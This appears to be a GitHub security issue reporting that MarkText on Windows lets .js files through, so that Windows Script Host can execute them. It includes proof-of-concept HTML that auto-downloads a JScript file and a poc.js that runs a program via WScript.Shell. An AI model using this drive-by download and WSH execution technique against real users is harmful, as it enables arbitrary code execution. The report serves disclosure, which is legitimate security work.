MarkText on Windows doesn't filter WSH JScript, which may cause code execution #3575

liyansong2018 · 2023-02-09T08:53:23Z

Description

Although marktext filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.

Version: 0.17.1(latest)

Attachment

poc.md

poc.html

<!-- auto download !-->
<html>
<script>
    var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});
    var a = document.createElement('a');
    a.href = window.URL.createObjectURL(blob);
    a.download =  'poc.js';
    a.click();
</script>
</html>

<!-- click to download !-->
<a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>

poc.js

var WshShell = new ActiveXObject("WScript.Shell");
var ret = WshShell.run("calc");
if (ret == 0)
    WScript.Echo("You were hacked.")
WScript.Quit();

The text was updated successfully, but these errors were encountered:

liyansong2018 changed the title ~~Typora on Windows doesn't filter WSH JScript, which may cause code execution~~ MarkText on Windows doesn't filter WSH JScript, which may cause code execution Feb 9, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

MarkText on Windows doesn't filter WSH JScript, which may cause code execution #3575

MarkText on Windows doesn't filter WSH JScript, which may cause code execution #3575

liyansong2018 commented Feb 9, 2023

MarkText on Windows doesn't filter WSH JScript, which may cause code execution #3575

MarkText on Windows doesn't filter WSH JScript, which may cause code execution #3575

Comments

liyansong2018 commented Feb 9, 2023

Description

Attachment